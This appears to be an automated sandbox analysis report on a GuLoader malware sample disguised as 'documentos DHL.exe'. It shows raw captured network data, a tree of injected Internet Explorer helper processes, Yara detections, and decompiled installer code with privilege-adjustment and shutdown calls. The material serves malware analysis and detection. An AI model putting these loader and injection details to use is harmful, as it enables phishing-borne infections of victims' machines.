vW5kN'^4e2i>=}or[[qfb/(!rw{VJo^c/e+jf4jtOMoot#QS{2/~,+y_@;ZJtiD9c&h}A0<e9@VSd1 R-$@Z&DT4jW3"upM
2022-11-28 18:03:20 UTC	99	IN	Data Raw: 15 b5 03 3e ab fd 24 b9 7b 0c 6b 9d ab d4 fd 4f a7 ec bf 28 0c 20 27 37 78 b7 fb c1 62 36 6f f3 c8 54 af fc 62 23 15 e4 bd d6 56 27 18 34 a5 c4 8d 41 1c 5d 3c d8 7c 5f 9f 92 8e fa e8 02 35 ec 66 6c 99 aa 5b bb 5b eb 7b d2 01 8d e7 a4 3f 31 91 b4 80 1b 24 f6 ec 10 32 3e 90 f2 ad 0c 7d 09 f4 b2 b7 09 f4 75 f2 86 1b f6 ad 2e da 16 7b 5f 4b 57 6d 25 ae 05 8e f6 ee 7b 2d f4 ec 89 f1 a5 1b 64 35 78 53 3f a7 bc 19 1a 16 31 9f 1c 52 55 23 be eb f5 35 c7 07 f7 85 50 5d 33 48 6b d1 82 95 41 c2 82 8d c1 49 9c bd 66 22 89 2f 11 e2 45 09 8b c7 47 7f 6a 59 95 56 4a 3e a8 18 d6 8b d0 e3 b5 3e c1 9e d2 7d e3 56 bb a9 88 c0 f2 22 b6 3d 0b 8b 73 b6 48 7e eb 37 fb 79 63 07 97 2e 6a c7 b5 2a 52 c3 83 cf 39 f7 04 d2 3f a0 f3 c4 38 ce 03 b4 15 91 d6 68 28 3d f9 b8 bf 35 c7 8d Data Ascii: >${kO( '7xb6oTb#V'4A]<\|_5fl[[{?1$2>}u.{_KWm%{-d5xS?1RU#5P]3HkAIf"/EGjYVJ>>}V"=sH~7yc.j*R9?8h(=5
2022-11-28 18:03:20 UTC	100	IN	Data Raw: 88 85 c4 af 0d 70 60 c3 c6 13 9a 70 5a 14 4b 41 3f df 53 65 2a 92 fc c0 6f b8 e7 ed c3 49 1e e3 ec 16 e2 33 5c 40 00 e8 97 e9 82 49 3a ec 9c 42 20 85 86 8f ea 03 ba ee f2 3a 05 97 64 e2 95 27 57 ed 05 be 36 1f 34 ee 15 24 ca 4e e7 9c 71 b2 ca 02 56 e9 35 a1 14 86 9d 5f 71 11 c4 31 fc 7f 4f 7f a8 22 d8 08 53 7b ae 47 4b 18 d4 6f f0 d6 7e a5 a1 8b 02 94 3b 6c 2a 3d 56 78 0c 56 8e 87 34 44 5b 05 b3 38 42 d1 15 a1 92 10 c1 fb 5d 39 06 cb 91 50 e3 4c 3b 89 bd 47 ef 35 83 98 5e e9 ae b3 05 4f 8d b7 43 11 ed 73 c4 ed 6c ba 29 5e 16 ce 3a 36 a9 93 6e 7d 21 fc 27 e5 ab 5a 76 1f a4 c5 f0 e6 1b af ec 18 d3 7f 54 f7 8a 04 1d 10 be 80 db 36 29 e1 f5 c1 9b 95 3d c0 f3 8a 05 72 8d 73 3e 96 f8 b1 64 08 8a c7 51 53 7c 0c 4d 9c 17 e0 61 de 44 8e 4b 5c 44 5e 7d c1 c1 b5 87 Data Ascii: p`pZKA?SeoI3\@I:B :d'W64$NqV5_q1O"S{GKo~;l=VxV4D[8B]9PL;G5^OCsl)^:6n}!'ZvT6)=rs>dQS\|MaDK\D^}
2022-11-28 18:03:20 UTC	101	IN	Data Raw: a4 4a 31 91 b4 c6 6e 47 9d 8d 66 1c 4c e5 f2 ad 0c 7d 09 e0 7b 0b b6 5c 8d 80 af de 0f f7 6f 9b 4b b1 b7 e3 46 7e e5 0c da 58 16 ad 42 d2 e0 36 6f f9 54 1b 64 35 78 32 68 39 6e d3 9a 00 f1 e3 6c 2f 1b 32 21 58 4a 52 49 b0 16 67 e9 0b cd 47 af fc 81 70 98 7e 29 8d c1 49 9c dc 31 bc 5b e5 91 f4 85 b7 00 85 97 62 50 e2 ab 01 74 2d 97 5b 5b 1a 13 15 d3 7b 7b bf 5e ce b3 56 bb a9 88 a1 a5 bc 64 f7 8b 9d b3 51 dd 1b 49 43 69 03 d6 75 5a 6c e7 dc 89 b5 bb 15 06 30 49 80 98 56 80 a0 f3 c4 38 82 fb cd 8e cb 6b ca e8 3d f9 b8 bf 02 be b5 c5 a5 b2 c4 02 1f 8c a8 0d 6b bc 0b ca b2 31 8d 30 8d f7 7c 7b 60 5a ad 31 ab ff 11 5f 19 a2 f7 ec ec f4 c3 46 b2 8b 6b 81 61 ce 97 bb 25 e3 23 cd 6f 06 f4 57 f0 d1 4b 0f 6a 93 f5 b2 a9 f3 76 12 93 ae 1b 7a b5 d0 c3 59 78 17 80 0b Data Ascii: J1nGfL}{\oKF~XB6oTd5x2h9nl/2!XJRIgGp~)I1[bPt-[[{{^VdQICiuZl0IV8k=k10\|{`Z1_Fka%#oWKjvzYx
2022-11-28 18:03:20 UTC	103	IN	Data Raw: 63 a6 70 fb cd 86 5c be 3f cd aa 80 f1 af 4a 74 f3 98 e4 69 8d cb ce 44 ab 39 0e a4 d4 26 1a 7d 69 f9 4a 41 93 af 60 87 f3 3c 1e 39 6a 56 7d 8e 1c 31 12 20 3e e3 e7 1d 13 f3 aa 2d ba 24 1c 5a 75 8f ab 0b 75 44 b5 54 a3 e7 f5 9c 98 34 3e 57 4a 8d 6f ec 51 d1 be 75 04 9e 79 83 f0 1e f2 a1 ac 97 df 4d e8 83 c0 48 e4 de 12 56 bb 90 fd 4d 00 7e 97 d4 af ff 19 d1 94 ea 7e 8f 74 55 e6 75 9a 78 9f d7 2e b9 ce fa 1e 9e a0 de 5a 51 d6 8b 68 0f d2 63 a1 33 41 ac 32 60 46 48 74 52 6a 1d 2a 2a 3b e0 f6 01 0e 09 c9 22 15 9f 29 13 ff 8b df 56 b0 03 50 e1 ec 7c 48 00 1a 41 e7 b0 75 8f 7c be cc a6 01 ce 34 ba b6 81 05 bb df c3 ab 72 f5 fe 77 1e 16 cf 90 73 7f 7c 8c bc c1 5e 41 de 8b f0 36 23 f4 07 64 fb 90 6c 22 94 18 b9 b9 a9 12 44 d7 e8 30 1f 0e 07 3a 2b 70 5f e5 40 23 Data Ascii: cp\?JtiD9&}iJA`<9jV}1 >-$ZuuDT4>WJoQuyMHVM~~tUux.ZQhc3A2`FHtRj**;")VP\|HAu\|4rws\|^A6#dl"D0:+p_@#
2022-11-28 18:03:20 UTC	104	IN	Data Raw: 0b cd 47 af fc 81 70 98 7e 29 8d c1 49 9c dc 31 bc 5b e5 91 f4 85 b7 00 85 97 62 50 e2 ab 01 74 2d 97 5b 5b 1a 13 15 d3 7b 7b bf 5e ce b3 56 bb a9 88 a1 a5 bc 64 f7 8b 9d b3 51 dd 1b 49 43 69 03 d6 75 5a 6c e7 dc 89 b5 bb 15 06 30 49 80 98 56 80 a0 f3 c4 38 82 fb cd 8e cb 6b ca e8 3d f9 b8 bf 02 be b5 c5 a5 b2 c4 02 1f 8c a8 0d 6b bc 0b ca b2 31 8d 30 8d f7 7c 7b 60 5a ad 31 ab ff 11 5f 19 a2 f7 ec ec f4 c3 46 b2 8b 6b 81 61 ce 97 bb 25 e3 23 cd 6f 06 f4 57 f0 d1 4b 0f 6a 93 f5 b2 a9 f3 76 12 93 ae 1b 7a b5 d0 c3 59 78 17 80 0b 6a 86 77 3a 39 50 2c 98 07 d6 2e fc ef d0 78 c5 2a 38 5a ed b4 1f 09 ee 8a 2f 7e a3 c8 06 70 22 f6 67 59 b8 e3 db 1f d1 21 13 8f 35 03 9a e3 80 45 4e 44 00 fb c5 a2 5e 90 34 65 db a2 32 b5 69 d7 ce 62 1d 6e ad f5 a5 18 f0 1d 72 d2 Data Ascii: Gp~)I1[bPt-[[{{^VdQICiuZl0IV8k=k10\|{`Z1_Fka%#oWKjvzYxjw:9P,.x*8Z/~p"gY!5END^4e2ibnr
2022-11-28 18:03:20 UTC	105	IN	Data Raw: 34 3e 57 4a 8d 6f ec 51 d1 be 75 04 9e 79 83 f0 1e f2 a1 ac 97 df 4d e8 83 c0 48 e4 de 12 56 bb 90 fd 4d 00 7e 97 d4 af ff 19 d1 94 ea 7e 8f 74 55 e6 75 9a 78 9f d7 2e b9 ce fa 1e 9e a0 de 5a 51 d6 8b 68 0f d2 63 a1 33 41 ac 32 60 46 48 74 52 6a 1d 2a 2a 3b e0 f6 01 0e 09 c9 22 15 9f 29 13 ff 8b df 56 b0 03 50 e1 ec 7c 48 00 1a 41 e7 b0 75 8f 7c be cc a6 01 ce 34 ba b6 81 05 bb df c3 ab 72 f5 fe 77 1e 16 cf 90 73 7f 7c 8c bc c1 5e 41 de 8b f0 36 23 f4 07 64 fb 90 6c 22 94 18 b9 b9 a9 12 44 d7 e8 30 1f 0e 07 3a 2b 70 5f e5 40 23 fb 91 7b 49 cc 68 5e 3f 7b 3e a5 23 53 7a f9 c8 af 62 de a6 23 ac a5 c0 e9 38 9f da af 15 ee 6c f9 28 15 b5 03 3e 8e fd 57 b9 27 0c 4e 9d d8 d4 a1 4f 82 ec cc 28 22 20 42 37 00 b7 9e c1 62 36 6f f3 c5 5e a2 f6 62 23 15 e4 93 d6 33 Data Ascii: 4>WJoQuyMHVM~~tUux.ZQhc3A2`FHtRj**;")VP\|HAu\|4rws\|^A6#dl"D0:+p_@#{Ih^?{>#Szb#8l(>W'NO(" B7b6o^b#3
2022-11-28 18:03:20 UTC	106	IN	Data Raw: 49 80 98 56 80 a0 f3 c4 38 82 fb cd 8e cb 6b ca e8 3d f9 b8 bf 02 be b5 c5 a5 b2 c4 02 1f 8c a8 0d 6b bc 0b ca b2 31 8d 30 8d f7 7c 7b 60 5a ad 31 ab ff 11 5f 19 a2 f7 ec ec f4 c3 46 b2 8b 6b 81 61 ce 97 bb 25 e3 23 cd 6f 06 f4 57 f0 d1 4b 0f 6a 93 f5 b2 a9 f3 76 12 93 ae 1b 7a b5 d0 c3 59 78 17 80 0b 6a 86 77 3a 39 50 2c 98 07 d6 2e fc ef d0 78 c5 2a 38 5a ed b4 1f 09 ee 8a 2f 7e a3 c8 06 70 22 f6 67 59 b8 e3 db 1f d1 21 13 8f 35 03 9a e3 80 45 4e 44 00 fb c5 a2 5e 90 34 65 db a2 32 b5 69 d7 ce 62 1d 6e ad f5 a5 18 f0 1d 72 d2 bf de d8 3f 5b ae fd 32 66 b3 00 0f 0d 5f 28 cb 0f ea 09 7e ec 84 f9 a5 d3 7d 72 c2 77 13 56 fd 4a c7 c4 9e ce 00 fb 3a 63 f5 a6 69 9e 31 99 fb 2b 9e 6a 00 34 cd c5 1c 92 f1 16 06 8e ab 4f fa 7f 28 f6 95 84 8f fc 92 6f cd a1 0b ea Data Ascii: IV8k=k10\|{`Z1_Fka%#oWKjvzYxjw:9P,.x*8Z/~p"gY!5END^4e2ibnr?[2f_(~}rwVJ:ci1+j4O(o
2022-11-28 18:03:20 UTC	107	IN	Data Raw: 46 48 74 52 6a 1d 2a 2a 3b e0 f6 01 0e 09 c9 22 15 9f 29 13 ff 8b df 56 b0 03 50 e1 ec 7c 48 00 1a 41 e7 b0 75 8f 7c be cc a6 01 ce 34 ba b6 81 05 bb df c3 ab 72 f5 fe 77 1e 16 cf 90 73 7f 7c 8c bc c1 5e 41 de 8b f0 36 23 f4 07 64 fb 90 6c 22 94 18 b9 b9 a9 12 44 d7 e8 30 1f 0e 07 3a 2b 70 5f e5 40 23 fb 91 7b 49 cc 68 5e 3f 7b 3e a5 23 53 7a f9 c8 af 62 de a6 23 ac a5 c0 e9 38 9f da af 15 ee 6c f9 28 15 b5 03 3e 8e fd 57 b9 27 0c 4e 9d d8 d4 a1 4f 82 ec cc 28 22 20 42 37 00 b7 9e c1 62 36 6f f3 c5 5e a2 f6 62 23 15 e4 93 d6 33 27 60 34 c0 c4 8d 41 1c 5d 12 d8 7c 5f b1 92 ea fa 84 02 59 ec 66 6c 99 aa 33 bb 3f eb 19 d2 01 8d ca a4 4a 31 91 b4 c6 6e 47 9d 8d 66 1c 4c e5 f2 ad 0c 7d 09 e0 7b 0b b6 5c 8d 80 af de 0f f7 6f 9b 4b b1 b7 e3 46 7e e5 0c da 58 16 Data Ascii: FHtRj**;")VP\|HAu\|4rws\|^A6#dl"D0:+p_@#{Ih^?{>#Szb#8l(>W'NO(" B7b6o^b#3'`4A]\|_Yfl3?J1nGfL}{\oKF~X
2022-11-28 18:03:20 UTC	109	IN	Data Raw: f0 d1 4b 0f 6a 93 f5 b2 a9 f3 76 12 93 ae 1b 7a b5 d0 c3 59 78 17 80 0b 6a 86 77 3a 39 50 2c 98 07 d6 2e fc ef d0 78 c5 2a 38 5a ed b4 1f 09 ee 8a 2f 7e a3 c8 06 70 22 f6 67 59 b8 e3 db 1f d1 21 13 8f 35 03 9a e3 80 45 4e 44 00 fb c5 a2 5e 90 34 65 db a2 32 b5 69 d7 ce 62 1d 6e ad f5 a5 18 f0 1d 72 d2 bf de d8 3f 5b ae fd 32 66 b3 00 0f 0d 5f 28 cb 0f ea 09 7e ec 84 f9 a5 d3 7d 72 c2 77 13 56 fd 4a c7 c4 9e ce 00 fb 3a 63 f5 a6 69 9e 31 99 fb 2b 9e 6a 00 34 cd c5 1c 92 f1 16 06 8e ab 4f fa 7f 28 f6 95 84 8f fc 92 6f cd a1 0b ea 1b af 9b 90 8e 23 c2 8d 34 53 15 b8 cc dd 1c 00 c2 da d9 2f e2 7f e6 b8 0c a4 45 80 c5 11 4e 79 12 40 63 a6 70 fb cd 86 5c be 3f cd aa 80 f1 af 4a 74 f3 98 e4 69 8d cb ce 44 ab 39 0e a4 d4 26 1a 7d 69 f9 4a 41 93 af 60 87 f3 3c 1e Data Ascii: KjvzYxjw:9P,.x*8Z/~p"gY!5END^4e2ibnr?[2f_(~}rwVJ:ci1+j4O(o#4S/ENy@cp\?JtiD9&}iJA`<

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: documentos DHL.exePID: 7424, Parent PID: 4684

General

Target ID:	2
Start time:	19:02:24
Start date:	28/11/2022
Path:	C:\Users\user\Desktop\documentos DHL.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x400000
File size:	339276 bytes
MD5 hash:	CA1CD0656568AF4F58AA28E61A3E3EDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8576, Parent PID: 7424

General

Target ID:	16
Start time:	19:02:53
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8584, Parent PID: 7424

General

Target ID:	17
Start time:	19:02:53
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8596, Parent PID: 7424

General

Target ID:	18
Start time:	19:02:53
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8604, Parent PID: 7424

General

Target ID:	19
Start time:	19:02:54
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8612, Parent PID: 7424

General

Target ID:	20
Start time:	19:02:54
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8620, Parent PID: 7424

General

Target ID:	21
Start time:	19:02:54
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8628, Parent PID: 7424

General

Target ID:	22
Start time:	19:02:55
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8640, Parent PID: 7424

General

Target ID:	23
Start time:	19:02:55
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8648, Parent PID: 7424

General

Target ID:	24
Start time:	19:02:55
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8672, Parent PID: 7424

General

Target ID:	25
Start time:	19:02:55
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 8680, Parent PID: 7424

General

Target ID:	26
Start time:	19:02:56
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x4b0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8688, Parent PID: 7424

General

Target ID:	27
Start time:	19:02:56
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8696, Parent PID: 7424

General

Target ID:	28
Start time:	19:02:56
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8704, Parent PID: 7424

General

Target ID:	29
Start time:	19:02:57
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8712, Parent PID: 7424

General

Target ID:	30
Start time:	19:02:57
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8720, Parent PID: 7424

General

Target ID:	31
Start time:	19:02:57
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8728, Parent PID: 7424

General

Target ID:	32
Start time:	19:02:58
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8736, Parent PID: 7424

General

Target ID:	33
Start time:	19:02:58
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8748, Parent PID: 7424

General

Target ID:	34
Start time:	19:02:58
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8760, Parent PID: 7424

General

Target ID:	35
Start time:	19:02:59
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ielowutil.exePID: 8776, Parent PID: 7424

General

Target ID:	36
Start time:	19:02:59
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x3e0000
File size:	221696 bytes
MD5 hash:	650FE7460630188008BF8C8153526CEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ExtExport.exePID: 8784, Parent PID: 7424

General

Target ID:	37
Start time:	19:02:59
Start date:	28/11/2022
Path:	C:\Program Files (x86)\Internet Explorer\ExtExport.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\documentos DHL.exe
Imagebase:	0x190000
File size:	45056 bytes
MD5 hash:	3253FD643C51C133C3489A146781913B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000025.00000000.1618126975.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: documentos DHL.exePID: 7424, Parent PID: 4684COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	1.8%
Signature Coverage:	21.4%
Total number of Nodes:	897
Total number of Limit Nodes:	39

Executed Functions

Function 00403489 Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a24c = _t51;
				if(_t51 != 6) {
					_t149 = E0040678A(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x42a318 = _t56;
				SHGetFileInfoW(0x4216e8, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E004063B0(0x429240, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\documentos DHL.exe\"";
				E004063B0(_t193, _t60);
				 *0x42a240 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Arthur\\Desktop\\documentos DHL.exe\"" == 0x22) {
					_t63 =  &M00435002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405CAE(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E00403458(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402F14(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E004039CC();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x42a2f4 - _t151;
								if( *0x42a2f4 == _t151) {
									L72:
									_t72 =  *0x42a30c;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E0040678A(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
